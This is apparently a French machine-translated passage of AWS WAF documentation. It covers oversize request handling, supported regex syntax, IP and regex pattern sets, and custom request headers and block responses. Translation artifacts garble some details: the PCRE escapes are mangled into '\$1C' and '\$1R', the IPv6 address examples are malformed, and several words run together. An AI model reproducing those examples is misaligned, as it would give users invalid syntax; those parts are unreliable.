+ **`Headers`**— AWS WAF peut inspecter au maximum les 8 premiers Ko (8 192 octets) des en-têtes de requête et au plus les 200 premiers en-têtes. Le contenu peut être consulté AWS WAF jusqu'à la première limite atteinte. 

  Ces limites s'appliquent lorsque vous inspectez tous les en-têtes d'une demande. Lorsque vous inspectez un seul en-tête, vous AWS WAF pouvez inspecter le contenu complet de cet en-tête sans ces restrictions de taille ou de nombre.
+ **`Cookies`**— AWS WAF peut inspecter au maximum les 8 premiers Ko (8 192 octets) des cookies de demande et au plus les 200 premiers cookies. Le contenu peut être consulté AWS WAF jusqu'à la première limite atteinte. 

**Options de gestion surdimensionnées pour vos déclarations de règles**  
Lorsque vous rédigez une instruction de règle qui inspecte l'un de ces types de composants de demande, vous spécifiez comment gérer les composants surdimensionnés. La gestion des surdimensionnements indique AWS WAF ce qu'il faut faire avec une requête Web lorsque le composant de demande inspecté par la règle dépasse les limites de taille. 

Les options de gestion des composants surdimensionnés sont les suivantes : 
+ **Continue**— Inspectez le composant de demande normalement conformément aux critères d'inspection des règles. AWS WAF inspectera le contenu du composant de la demande qui respecte les limites de taille. 
+ **Match**— Traitez la requête Web comme correspondant à l'énoncé de règle. AWS WAF applique l'action de règle à la demande sans l'évaluer par rapport aux critères d'inspection de la règle. 
+ **No match**— Traitez la requête Web comme ne correspondant pas à l'énoncé de règle sans l'évaluer par rapport aux critères d'inspection de la règle. AWS WAF poursuit son inspection de la requête Web en utilisant le reste des règles du pack de protection (ACL Web) comme il le ferait pour toute règle non correspondante. 

Dans la AWS WAF console, vous devez choisir l'une de ces options de gestion. En dehors de la console, l'option par défaut estContinue. 

Si vous utilisez cette Match option dans une règle dont l'action est définie surBlock, la règle bloquera une demande dont le composant inspecté est surdimensionné. Quelle que soit la configuration, la disposition finale de la demande dépend de divers facteurs, tels que la configuration des autres règles de votre pack de protection (ACL Web) et le paramètre d'action par défaut du pack de protection (ACL Web). 

**Gestion des surdimensionnements dans des groupes de règles dont vous n'êtes pas le propriétaire**  
Les limites de taille et de nombre de composants s'appliquent à toutes les règles que vous utilisez dans votre pack de protection (ACL Web). Cela inclut toutes les règles que vous utilisez mais que vous ne gérez pas, dans les groupes de règles gérés et dans les groupes de règles partagés avec vous par un autre compte. 

Lorsque vous utilisez un groupe de règles que vous ne gérez pas, celui-ci peut comporter une règle qui inspecte un composant de demande limité, mais qui ne gère pas les contenus surdimensionnés comme vous le souhaitez. Pour plus d'informations sur la façon dont les règles AWS gérées gèrent les composants surdimensionnés, consultez[AWS Liste des groupes de règles gérées](aws-managed-rule-groups-list.md). Pour plus d'informations sur les autres groupes de règles, adressez-vous à votre fournisseur de groupes de règles.

**Directives relatives à la gestion des composants surdimensionnés de votre pack de protection (ACL Web)**  
La façon dont vous gérez les composants surdimensionnés dans votre pack de protection (ACL Web) peut dépendre d'un certain nombre de facteurs tels que la taille attendue du contenu des composants de votre demande, le traitement des demandes par défaut de votre pack de protection (ACL Web) et la manière dont les autres règles de votre pack de protection (ACL Web) correspondent et traitent les demandes. 

Les directives générales relatives à la gestion des composants de requêtes Web surdimensionnés sont les suivantes : 
+ Si vous devez autoriser certaines demandes dont le contenu des composants est surdimensionné, ajoutez si possible des règles pour n'autoriser explicitement que ces demandes. Priorisez ces règles afin qu'elles s'exécutent avant toutes les autres règles du pack de protection (ACL Web) qui inspectent les mêmes types de composants. Avec cette approche, vous ne pourrez pas AWS WAF inspecter l'intégralité du contenu des composants surdimensionnés que vous autorisez à transmettre à votre ressource protégée.
+ Pour toutes les autres demandes, vous pouvez empêcher tout octet supplémentaire de passer en bloquant les demandes qui dépassent la limite : 
  + **Vos règles et groupes de règles** : dans vos règles qui inspectent les composants soumis à des limites de taille, configurez la gestion des surdimensionnements afin de bloquer les demandes dépassant cette limite. Par exemple, si votre règle bloque les demandes dont le contenu d'en-tête est spécifique, définissez la gestion des en-têtes surdimensionnés de manière à ce qu'elle corresponde aux demandes dont le contenu d'en-tête est surdimensionné. Sinon, si votre pack de protection (ACL Web) bloque les demandes par défaut et que votre règle autorise un contenu d'en-tête spécifique, configurez la gestion du surdimensionnement de votre règle pour qu'elle ne corresponde à aucune demande dont le contenu d'en-tête est surdimensionné. 
  + **Groupes de règles que vous ne gérez pas** : pour empêcher les groupes de règles que vous ne gérez pas d'autoriser des composants de demande surdimensionnés, vous pouvez ajouter une règle distincte qui inspecte le type de composant de demande et bloque les demandes qui dépassent les limites. Priorisez la règle dans votre pack de protection (ACL Web) afin qu'elle s'exécute avant les groupes de règles. Par exemple, vous pouvez bloquer les demandes dont le contenu du corps est surdimensionné avant que l'une de vos règles d'inspection corporelle ne soit exécutée dans le pack de protection (ACL Web). La procédure suivante décrit comment ajouter ce type de règle.

## Blocage des composants de requête Web surdimensionnés
<a name="waf-oversize-request-components-blocking"></a>

Vous pouvez ajouter une règle dans votre pack de protection (ACL Web) qui bloque les demandes contenant des composants surdimensionnés. 

**Pour ajouter une règle bloquant les contenus surdimensionnés**

1. Lorsque vous créez ou modifiez votre pack de protection (ACL Web), dans les paramètres des règles, choisissez **Ajouter des règles**, **Ajouter mes propres règles et groupes de règles**, **Générateur de règles**, puis **Éditeur visuel de règles**. Pour obtenir des conseils sur la création ou la modification d'un pack de protection (ACL Web), consultez[Affichage des statistiques du trafic Web dans AWS WAF](web-acl-working-with.md).

1. Entrez un nom pour votre règle et laissez le paramètre **Type** sur **Règle normale**. 

1. Modifiez les paramètres de correspondance suivants par rapport à leurs valeurs par défaut : 

   1. **Dans Statement****, pour **Inspect**, ouvrez le menu déroulant et choisissez le composant de requête Web dont vous avez besoin, soit **Body**, **Headers**, soit Cookies.** 

   1. Pour **Type de correspondance**, choisissez **Taille supérieure à**. 

   1. Pour **Taille**, tapez un nombre correspondant au moins à la taille minimale pour le type de composant. Pour les en-têtes et les cookies, tapez`8192`. Dans Application Load Balancer ou dans les packs de AWS AppSync protection (Web ACLs), pour les corps, tapez. `8192` Pour les corps contenus dans CloudFront les packs de protection API Gateway, Amazon Cognito, App Runner ou Verified Access (Web ACLs), si vous utilisez la limite de taille par défaut, tapez. `16384` Sinon, saisissez la limite de taille que vous avez définie pour votre pack de protection (ACL Web). 

   1. Pour la **gestion des objets surdimensionnés**, sélectionnez Faire **correspondre**. 

1. Pour **Action**, sélectionnez **Bloquer**.

1. Choisissez **Ajouter une règle**.

1. Après avoir ajouté la règle, sur la page **Définir la priorité** des règles, déplacez-la au-dessus des règles ou des groupes de règles de votre pack de protection (ACL Web) qui inspectent le même type de composant. Cela donne à la nouvelle règle un paramètre de priorité numérique inférieur, ce qui oblige AWS WAF à l'évaluer en premier. Pour de plus amples informations, veuillez consulter [Définition de la priorité des règles](web-acl-processing-order.md).

# Syntaxe d'expression régulière prise en charge dans AWS WAF
<a name="waf-regex-pattern-support"></a>

AWS WAF prend en charge la syntaxe du modèle d'expression régulière utilisée par la bibliothèque `libpcre` PCRE. La bibliothèque est documentée sur [PCRE - Perl Compatible Regular Expressions](http://www.pcre.org/). 

AWS WAF ne prend pas en charge toutes les constructions de la bibliothèque. Par exemple, il prend en charge certaines assertions de largeur nulle, mais pas toutes. Nous ne disposons pas de liste complète des constructions prises en charge. Toutefois, si vous fournissez un modèle d'expression régulière qui n'est pas valide ou si vous utilisez des constructions non prises en charge, l' AWS WAF API signale un échec. 

AWS WAF ne prend pas en charge les modèles PCRE suivants : 
+ Références arrières et capture de sous-expressions
+ Références de sous-routines et modèles récursifs
+ Modèles conditionnels
+ Verbes de contrôle de suivi arrière
+ Directive octet unique \$1C
+ Directive de correspondance de nouvelle ligne \$1R
+ Début \$1K de directive de réinitialisation de correspondance
+ Légendes et code intégré
+ Regroupement atomique et quantificateurs possessifs

# Ensembles d'adresses IP et ensembles de modèles regex dans AWS WAF
<a name="waf-referenced-set-managing"></a>

Cette section présente les sujets relatifs aux ensembles d'adresses IP et aux ensembles de modèles regex.

AWS WAF stocke des informations plus complexes dans des ensembles que vous utilisez en les référençant dans vos règles. Chacun de ces ensembles a un nom et un ARN (Amazon Resource Name) lui est attribué lors de sa création. Vous pouvez gérer ces jeux à partir de vos instructions de règles et vous pouvez y accéder et les gérer vous-même, via le volet de navigation de la console. 

Vous pouvez utiliser un ensemble géré dans un groupe de règles ou un pack de protection (ACL Web).
+ Pour utiliser un ensemble d'adresses IP, voir[Instruction de correspondance d'ensemble d'adresses IP de règle](waf-rule-statement-type-ipset-match.md). 
+ Pour utiliser un ensemble de modèles regex, voir[Instruction de correspondance d'ensemble de modèles d'expression régulière de règle](waf-rule-statement-type-regex-pattern-set-match.md). 

**Incohérences temporaires lors des mises à jour**  
Lorsque vous créez ou modifiez un pack de protection (ACL Web) ou d'autres AWS WAF ressources, les modifications mettent peu de temps à se propager à toutes les zones où les ressources sont stockées. Le temps de propagation peut aller de quelques secondes à plusieurs minutes. 

Voici des exemples d'incohérences temporaires que vous pourriez remarquer lors de la propagation des modifications : 
+ Après avoir créé un pack de protection (ACL Web), si vous essayez de l'associer à une ressource, vous pouvez obtenir une exception indiquant que le pack de protection (ACL Web) n'est pas disponible. 
+ Une fois que vous avez ajouté un groupe de règles à un pack de protection (ACL Web), les nouvelles règles du groupe de règles peuvent être en vigueur dans une zone où le pack de protection (ACL Web) est utilisé et pas dans une autre.
+ Une fois que vous avez modifié le paramètre d'une action de règle, vous pouvez voir l'ancienne action à certains endroits et la nouvelle action à d'autres. 
+ Après avoir ajouté une adresse IP à un ensemble d'adresses IP utilisé dans une règle de blocage, la nouvelle adresse peut être bloquée dans une zone alors qu'elle est toujours autorisée dans une autre.

**Topics**
+ [Création et gestion d'une adresse IP définie dans AWS WAF](waf-ip-set-managing.md)
+ [Création et gestion d'un modèle regex défini dans AWS WAF](waf-regex-pattern-set-managing.md)

# Création et gestion d'une adresse IP définie dans AWS WAF
<a name="waf-ip-set-managing"></a>

Un jeu d'adresses IP fournit une collection d'adresses IP et de plages d'adresses IP que vous souhaitez utiliser ensemble dans une instruction de règle. Les ensembles d'adresses IP sont AWS des ressources. 

Pour utiliser une adresse IP définie dans un pack de protection (ACL Web) ou un groupe de règles, vous devez d'abord créer une AWS ressource `IPSet` avec les spécifications de votre adresse. Vous faites ensuite référence à l'ensemble lorsque vous ajoutez une instruction de règle d'ensemble d'adresses IP à un pack de protection (ACL Web) ou à un groupe de règles. 

## Création d'un ensemble d'adresses IP
<a name="waf-ip-set-creating"></a>

Suivez la procédure décrite dans cette section pour créer un nouvel ensemble d'adresses IP.

**Note**  
Outre la procédure décrite dans cette section, vous avez la possibilité d'ajouter un nouvel ensemble d'adresses IP lorsque vous ajoutez une règle de correspondance d'adresses IP à votre pack de protection (ACL Web) ou à votre groupe de règles. Pour choisir cette option, vous devez fournir les mêmes paramètres que ceux requis par cette procédure. 

**Pour créer un ensemble d'adresses IP**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le volet de navigation, choisissez **Jeux d'adresses IP** puis **Créer un jeu d'adresses IP**. 

1. Saisissez un nom et une description pour le jeu d'adresses. Vous les utiliserez pour identifier l'ensemble lorsque vous souhaitez l'utiliser. 
**Note**  
Vous ne pouvez pas modifier le nom une fois que vous créez l'ensemble d'adresses IP.

1. Pour **Région**, choisissez Global (CloudFront) ou choisissez la région dans laquelle vous souhaitez stocker l'ensemble d'adresses IP. Vous pouvez utiliser des ensembles d'adresses IP régionaux uniquement dans les packs de protection (Web ACLs) qui protègent les ressources régionales. Pour utiliser une adresse IP définie dans des packs de protection (Web ACLs) qui protègent les CloudFront distributions Amazon, vous devez utiliser Global (CloudFront). 

1. Pour **Version IP**, sélectionnez la version à utiliser.

1. Dans la zone de texte **Adresses IP**, entrez une adresse IP ou une plage d'adresses IP par ligne, en notation CIDR. AWS WAF prend en charge toutes IPv4 les plages IPv6 CIDR à l'exception de`/0`. Pour plus d'informations sur la notation CIDR, consultez l'article [Classless Inter-Domain Routing](https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing) sur Wikipédia (en anglais).

   Voici quelques exemples :
   + **Pour spécifier l' IPv4 adresse 192.0.2.44, tapez 192.0.2.44/32.**
   + **Pour spécifier l' IPv6 adresse 2620:0:2 d 0:200:0:0:0, tapez 2620:0:2 d 0:200:0:0:0:0 /128.**
   + **Pour spécifier la plage d' IPv4 adresses comprise entre 192.0.2.0 et 192.0.2.255, tapez 192.0.2.0/24.**
   + **Pour spécifier la plage d' IPv6 adresses comprise entre 2620:0:2 d 0:200:0:0:0:0 et 2620:0:2 d 0:200:ffff:ffff:ffff, entrez 2620:0:2 d 0:200 : :/64.**

1. Vérifiez les paramètres du jeu d'adresses IP, puis choisissez **Créer un jeu d'adresses IP**.

## Suppression d'un ensemble d'adresses IP
<a name="waf-ip-set-deleting"></a>

Suivez les instructions de cette section pour supprimer un ensemble référencé.

**Suppression d'ensembles et de groupes de règles référencés**  
Lorsque vous supprimez une entité que vous pouvez utiliser dans un pack de protection (ACL Web), comme un ensemble d'adresses IP, un ensemble de modèles regex ou un groupe de règles, AWS WAF vérifie si l'entité est actuellement utilisée dans un pack de protection (ACL Web). S'il constate qu'il est en cours d'utilisation, il vous AWS WAF avertit. AWS WAF est presque toujours capable de déterminer si une entité est référencée par un pack de protection (ACL Web). Cependant, dans de rares cas, il peut ne pas être en mesure de le faire. Si vous devez vous assurer que rien n'utilise actuellement l'entité, vérifiez-la dans vos packs de protection (Web ACLs) avant de la supprimer. Si l'entité est un ensemble référencé, vérifiez également qu'aucun groupe de règles ne l'utilise.

**Pour supprimer un ensemble d’adresses IP**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le panneau de navigation, choisissez **Ensembles d'adresses IP**.

1. Sélectionnez le jeu d'adresses IP à supprimer et choisissez **Supprimer**.

# Création et gestion d'un modèle regex défini dans AWS WAF
<a name="waf-regex-pattern-set-managing"></a>

Un ensemble de modèles regex fournit une collection d'expressions régulières que vous souhaitez utiliser ensemble dans une instruction de règle. Les ensembles de modèles Regex sont des AWS ressources. 

Pour utiliser un modèle d'expression régulière défini dans un pack de protection (ACL Web) ou un groupe de règles, vous devez d'abord créer une AWS ressource `RegexPatternSet` avec les spécifications de votre modèle d'expression régulière. Vous faites ensuite référence à l'ensemble lorsque vous ajoutez une instruction de règles d'ensemble de modèles regex à un pack de protection (ACL Web) ou à un groupe de règles. Un ensemble de modèles regex doit contenir au moins un modèle regex. 

Si votre ensemble de modèles regex contient plusieurs modèles regex, lorsqu'il est utilisé dans une règle, la correspondance des modèles est associée `OR` à la logique. Autrement dit, une demande web correspondra à l'instruction de règle de l'ensemble de modèles si le composant de demande correspond à l'un des modèles de l'ensemble.

AWS WAF prend en charge la syntaxe des modèles utilisée par la bibliothèque PCRE, `libpcre` à quelques exceptions près. La bibliothèque est documentée sur [PCRE - Perl Compatible Regular Expressions](http://www.pcre.org/). Pour plus d'informations sur AWS WAF le support, consultez[Syntaxe d'expression régulière prise en charge dans AWS WAF](waf-regex-pattern-support.md).

## Création d'un ensemble de modèles d'expression régulière
<a name="waf-regex-pattern-set-creating"></a>

Suivez la procédure décrite dans cette section pour créer un nouveau ensemble de modèles regex.

**Pour créer un ensemble de modèles regex**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le panneau de navigation, choisissez **Ensembles de modèles regex**, puis **Créer un ensemble de modèles regex**. 

1. Entrez un nom et une description pour l'ensemble de modèles regex. Vous les utiliserez pour l'identifier lorsque vous souhaitez utiliser l'ensemble. 
**Note**  
Vous ne pouvez pas modifier le nom après avoir créé l'ensemble de modèles regex.

1. Pour **Région**, choisissez Global (CloudFront) ou choisissez la région dans laquelle vous souhaitez stocker le jeu de modèles regex. Vous pouvez utiliser des ensembles de modèles regex régionaux uniquement dans les packs de protection (Web ACLs) qui protègent les ressources régionales. Pour utiliser un modèle regex défini dans les packs de protection (Web ACLs) qui protègent les CloudFront distributions Amazon, vous devez utiliser Global (CloudFront). 

1. Dans la zone de texte **Expressions régulières**, entrez un modèle regex par ligne. 

   Par exemple, l'expression régulière `I[a@]mAB[a@]dRequest` correspond aux chaînes suivantes : `IamABadRequest`, `IamAB@dRequest`, `I@mABadRequest` et `I@mAB@dRequest`.

   AWS WAF prend en charge la syntaxe des modèles utilisée par la bibliothèque PCRE, `libpcre` à quelques exceptions près. La bibliothèque est documentée sur [PCRE - Perl Compatible Regular Expressions](http://www.pcre.org/). Pour plus d'informations sur AWS WAF le support, consultez[Syntaxe d'expression régulière prise en charge dans AWS WAF](waf-regex-pattern-support.md).

1. Passez en revue les paramètres de l'ensemble de modèles regex et choisissez **Créer un ensemble de modèles regex**.

## Suppression d'un ensemble de modèles d'expression régulière
<a name="waf-regex-pattern-set-deleting"></a>

Suivez les instructions de cette section pour supprimer un ensemble référencé.

**Suppression d'ensembles et de groupes de règles référencés**  
Lorsque vous supprimez une entité que vous pouvez utiliser dans un pack de protection (ACL Web), comme un ensemble d'adresses IP, un ensemble de modèles regex ou un groupe de règles, AWS WAF vérifie si l'entité est actuellement utilisée dans un pack de protection (ACL Web). S'il constate qu'il est en cours d'utilisation, il vous AWS WAF avertit. AWS WAF est presque toujours capable de déterminer si une entité est référencée par un pack de protection (ACL Web). Cependant, dans de rares cas, il peut ne pas être en mesure de le faire. Pour être sûr que rien n'utilise actuellement l'entité, vérifiez-la dans vos packs de protection (Web ACLs) avant de la supprimer. Si l'entité est un ensemble référencé, vérifiez également qu'aucun groupe de règles ne l'utilise.

**Pour supprimer un ensemble de modèles regex**

1. Connectez-vous à la AWS WAF console AWS Management Console et ouvrez-la sur [https://console.aws.amazon.com/wafv2/homev2](https://console.aws.amazon.com/wafv2/homev2). 

1. Dans le panneau de navigation, choisissez **Ensembles de modèles regex**.

1. Sélectionnez l'ensemble de modèles regex que vous souhaitez supprimer et choisissez **Supprimer**.

# Demandes et réponses Web personnalisées dans AWS WAF
<a name="waf-custom-request-response"></a>

Cette section explique comment ajouter un comportement personnalisé de gestion des demandes et réponses Web à vos actions de AWS WAF règles et à vos actions du pack de protection par défaut (ACL Web). Vos paramètres personnalisés s'appliquent chaque fois que l'action à laquelle ils sont associés s'applique. 

Vous pouvez personnaliser les demandes et réponses Web de la manière suivante : 
+ AvecAllow, CountCAPTCHA, et Challenge actions, vous pouvez insérer des en-têtes personnalisés dans la requête Web. Lorsque AWS WAF la demande Web est transmise à la ressource protégée, celle-ci contient l'intégralité de la demande d'origine ainsi que les en-têtes personnalisés que vous avez insérés. Pour les Challenge actions CAPTCHA et, applique la personnalisation AWS WAF uniquement si la demande passe le CAPTCHA ou l'inspection du jeton de défi.
+ Avec Block les actions, vous pouvez définir une réponse personnalisée complète, avec le code de réponse, les en-têtes et le corps de la réponse. La ressource protégée répond à la demande en utilisant la réponse personnalisée fournie par AWS WAF. Votre réponse personnalisée remplace la réponse Block d'action par défaut de`403 (Forbidden)`.

**Paramètres d'action que vous pouvez personnaliser**  
Vous pouvez spécifier une demande ou une réponse personnalisée lorsque vous définissez les paramètres d'action suivants : 
+ Action de la règle. Pour plus d'informations, consultez [Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md).
+ Action par défaut pour un pack de protection (ACL Web). Pour plus d'informations, consultez [Configuration de l'action par défaut du pack de protection (ACL Web) dans AWS WAF](web-acl-default-action.md).

**Paramètres d'action que vous ne pouvez pas personnaliser**  
Vous *ne pouvez pas* spécifier le traitement personnalisé des demandes dans l'action de remplacement pour un groupe de règles que vous utilisez dans un pack de protection (ACL Web). Consultez [Utilisation de packs de protection (Web ACLs) avec des règles et des groupes de règles dans AWS WAF](web-acl-processing.md). Voir également [Utilisation des instructions de groupes de règles gérés dans AWS WAF](waf-rule-statement-type-managed-rule-group.md) et[Utilisation des instructions de groupe de règles dans AWS WAF](waf-rule-statement-type-rule-group.md).

**Incohérences temporaires lors des mises à jour**  
Lorsque vous créez ou modifiez un pack de protection (ACL Web) ou d'autres AWS WAF ressources, les modifications mettent peu de temps à se propager à toutes les zones où les ressources sont stockées. Le temps de propagation peut aller de quelques secondes à plusieurs minutes. 

Voici des exemples d'incohérences temporaires que vous pourriez remarquer lors de la propagation des modifications : 
+ Après avoir créé un pack de protection (ACL Web), si vous essayez de l'associer à une ressource, vous pouvez obtenir une exception indiquant que le pack de protection (ACL Web) n'est pas disponible. 
+ Une fois que vous avez ajouté un groupe de règles à un pack de protection (ACL Web), les nouvelles règles du groupe de règles peuvent être en vigueur dans une zone où le pack de protection (ACL Web) est utilisé et pas dans une autre.
+ Une fois que vous avez modifié le paramètre d'une action de règle, vous pouvez voir l'ancienne action à certains endroits et la nouvelle action à d'autres. 
+ Après avoir ajouté une adresse IP à un ensemble d'adresses IP utilisé dans une règle de blocage, la nouvelle adresse peut être bloquée dans une zone alors qu'elle est toujours autorisée dans une autre.

**Limites relatives à votre utilisation de demandes et de réponses personnalisées**  
AWS WAF définit les paramètres maximaux pour votre utilisation des demandes et réponses personnalisées. Par exemple, un nombre maximum d'en-têtes de demande par pack de protection (ACL Web) ou groupe de règles, et un nombre maximum d'en-têtes personnalisés pour une seule définition de réponse personnalisée. Pour plus d'informations, consultez [AWS WAF quotas](limits.md).

**Topics**
+ [Insertion d'en-têtes de demande personnalisés pour les actions non bloquantes](customizing-the-incoming-request.md)
+ [Envoi de réponses personnalisées pour les Block actions](customizing-the-response-for-blocked-requests.md)
+ [Codes d'état pris en charge pour les réponses personnalisées](customizing-the-response-status-codes.md)

# Insertion d'en-têtes de demande personnalisés pour les actions non bloquantes
<a name="customizing-the-incoming-request"></a>

Cette section explique comment indiquer d' AWS WAF insérer des en-têtes personnalisés dans la requête HTTP d'origine lorsqu'une action de règle ne bloque pas la demande. Avec cette option, vous ne faites qu'ajouter des éléments à la demande. Vous ne pouvez modifier ou remplacer aucune partie de la demande initiale. Les cas d'utilisation de l'insertion d'en-têtes personnalisés incluent le fait de signaler à une application en aval de traiter la demande différemment en fonction des en-têtes insérés et de marquer la demande pour analyse.

**Important**  
Cette option s'applique aux actions de règles AllowCount,CAPTCHA, Challenge et aux actions par défaut du pack de protection (ACL Web) définies surAllow. Pour plus d'informations sur les actions de règle, consultez [Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md). Pour plus d'informations sur les actions du pack de protection par défaut (ACL Web), consultez[Configuration de l'action par défaut du pack de protection (ACL Web) dans AWS WAF](web-acl-default-action.md).

## Considérations relatives à l'utilisation de noms d'en-tête de demande personnalisés
<a name="using-custom-request-header-names"></a>

**Préfixes ajoutés aux en-têtes de demandes**  
AWS WAF préfixe tous les en-têtes de demande qu'il insère`x-amzn-waf-`, afin d'éviter toute confusion avec les en-têtes déjà présents dans la demande. Par exemple, si vous spécifiez le nom de l'en-tête`sample`, AWS WAF insère l'en-tête`x-amzn-waf-sample`.

**Important**  
Pour des raisons de sécurité, vous pouvez ajouter une règle de correspondance de chaînes qui bloque les demandes dont l'en-tête commence déjà par`x-amzn-waf-`. Cela bloque les demandes provenant d'AWS WAF autres sources qui imitent la chaîne de `x-amzn-waf-` préfixe insérée AWS WAF lors du traitement des en-têtes de demande personnalisés.

L'exemple suivant montre une règle de correspondance de chaînes configurée pour bloquer le trafic lorsque le `x-amzn-waf-` préfixe n'a pas été inséré par AWS WAF :

```
    "Rules": [
        {
          "Name": "CustomHeader",
          "Priority": 0,
          "Statement": {
            "ByteMatchStatement": {
              "SearchString": " x-amzn-waf-",
              "FieldToMatch": {
                "Headers": {
                  "MatchPattern": {
                    "All": {}
                  },
                  "MatchScope": "KEY",
                  "OversizeHandling": "MATCH"
                }
              },
              "TextTransformations": [
                {
                  "Priority": 0,
                  "Type": "NONE"
                }
              ],
              "PositionalConstraint": "STARTS_WITH"
            }
          },
          "Action": {
            "Block": {}
          },
          "VisibilityConfig": {
            "SampledRequestsEnabled": true,
            "CloudWatchMetricsEnabled": true,
            "MetricName": "CustomHeader"
          }
        }
      ]
```

Pour plus d'informations sur l'utilisation des règles de correspondance de chaînes, consultez[Instruction de correspondance de chaîne de règle](waf-rule-statement-type-string-match.md).

**En-têtes portant le même nom**  
Si la demande contient déjà un en-tête du même nom qui AWS WAF est en cours d'insertion, AWS WAF remplace l'en-tête. Ainsi, si vous définissez des en-têtes dans plusieurs règles portant des noms identiques, l'en-tête de la dernière règle permettant d'inspecter la demande et de trouver une correspondance sera ajouté, contrairement aux règles précédentes. 

## Utilisation d'en-têtes personnalisés avec des actions de règles non terminales
<a name="custom-request-header-non-terminating-rule-actions"></a>

Contrairement à l'Allowaction, l'Countaction ne s'arrête pas au traitement AWS WAF de la requête Web en utilisant les autres règles du pack de protection (ACL Web). De même, lorsque vous CAPTCHA Challenge déterminez que le jeton de demande est valide, ces actions n'arrêtent pas le traitement AWS WAF de la demande Web. Ainsi, si vous insérez des en-têtes personnalisés à l'aide d'une règle comportant l'une de ces actions, les règles suivantes peuvent également insérer des en-têtes personnalisés. Pour plus d'informations sur le comportement des actions relatives aux règles, consultez[Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md).

Supposons, par exemple, que vous disposiez des règles suivantes, classées par ordre de priorité dans l'ordre indiqué : 

1. RuleA avec une Count action et un en-tête personnalisé nommés`RuleAHeader`.

1. RuleB avec une Allow action et un en-tête personnalisé nommés. `RuleBHeader`

Si une demande correspond à la fois à la règle A et à la règle B, AWS WAF insère les en-têtes`x-amzn-waf-RuleBHeader`, `x-amzn-waf-RuleAHeader` puis transmet la demande à la ressource protégée. 

AWS WAF insère des en-têtes personnalisés dans une requête Web lorsqu'il a fini d'inspecter la demande. Ainsi, si vous utilisez le traitement personnalisé des demandes avec une règle dont l'action est définie surCount, les en-têtes personnalisés que vous ajoutez ne sont pas inspectés par les règles suivantes. 

## Exemple de traitement de demandes personnalisé
<a name="example-custom-request-handling"></a>

Vous définissez le traitement personnalisé des demandes pour l'action d'une règle ou pour l'action par défaut d'un pack de protection (ACL Web). La liste suivante montre le JSON pour la gestion personnalisée ajouté à l'action par défaut pour un pack de protection (ACL Web). 

```
{
 "Name": "SampleWebACL",
 "Scope": "REGIONAL",
 "DefaultAction": {
  "Allow": {
   "CustomRequestHandling": {
    "InsertHeaders": [
     {
      "Name": "fruit",
      "Value": "watermelon"
     },
     {
      "Name": "pie",
      "Value": "apple"
     }
    ]
   }
  }
 },
 "Description": "Sample protection pack (web ACL) with custom request handling configured for default action.",
 "Rules": [],
 "VisibilityConfig": {
  "SampledRequestsEnabled": true,
  "CloudWatchMetricsEnabled": true,
  "MetricName": "SampleWebACL"
 }
}
```

# Envoi de réponses personnalisées pour les Block actions
<a name="customizing-the-response-for-blocked-requests"></a>

Cette section explique comment indiquer de AWS WAF renvoyer une réponse HTTP personnalisée au client pour les actions de règles ou les actions par défaut du pack de protection (ACL Web) définies sur. Block Pour plus d'informations sur les actions de règle, consultez [Utilisation des actions liées aux règles dans AWS WAF](waf-rule-action.md). Pour plus d'informations sur les actions du pack de protection par défaut (ACL Web), consultez[Configuration de l'action par défaut du pack de protection (ACL Web) dans AWS WAF](web-acl-default-action.md).

Lorsque vous définissez une gestion personnalisée des réponses pour une Block action, vous définissez le code d'état, les en-têtes et le corps de la réponse. Pour obtenir la liste des codes d'état que vous pouvez utiliser AWS WAF, consultez la section suivante,[Codes d'état pris en charge pour les réponses personnalisées](customizing-the-response-status-codes.md). 

**Cas d’utilisation**  
Les cas d'utilisation des réponses personnalisées sont les suivants : 
+ Renvoyer un code d'état autre que celui par défaut au client.
+ Renvoi d'en-têtes de réponse personnalisés au client. Vous pouvez spécifier n'importe quel nom d'en-tête, à l'exception de`content-type`.
+ Renvoi d'une page d'erreur statique au client.
+ Redirection du client vers une autre URL. Pour ce faire, vous spécifiez l'un des codes d'état de `3xx` redirection, tel que `301 (Moved Permanently)` ou`302 (Found)`, puis vous spécifiez un nouvel en-tête `Location` portant le nom de la nouvelle URL. 

**Interaction avec les réponses que vous définissez dans votre ressource protégée**  
Les réponses personnalisées que vous spécifiez pour l' AWS WAF Blockaction ont priorité sur les spécifications de réponse que vous définissez dans votre ressource protégée. 

Le service hôte de la AWS ressource que vous protégez AWS WAF peut permettre un traitement personnalisé des réponses aux requêtes Web. Voici quelques exemples : 
+ Avec Amazon CloudFront, vous pouvez personnaliser la page d'erreur en fonction du code d'état. Pour plus d'informations, consultez la section [Génération de réponses d'erreur personnalisées](https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/GeneratingCustomErrorResponses.html) dans le manuel *Amazon CloudFront Developer Guide*. 
+ Avec Amazon API Gateway, vous pouvez définir le code de réponse et de statut de votre passerelle. Pour plus d'informations, consultez [les réponses de Gateway dans API Gateway](https://docs.aws.amazon.com/apigateway/latest/developerguide/api-gateway-gatewayResponse-definition.html) dans le manuel *Amazon API Gateway Developer Guide*. 

Vous ne pouvez pas combiner AWS WAF des paramètres de réponse personnalisés avec des paramètres de réponse personnalisés dans la AWS ressource protégée. La spécification de réponse pour toute demande Web individuelle provient entièrement AWS WAF ou entièrement de la ressource protégée. 

Pour les requêtes Web AWS WAF bloquées, voici l'ordre de priorité.

1. **AWS WAF réponse personnalisée** — Si une réponse personnalisée est activée pour l' AWS WAF Blockaction, la ressource protégée renvoie la réponse personnalisée configurée au client. Les paramètres de réponse que vous avez éventuellement définis dans la ressource protégée elle-même n'ont aucun effet. 

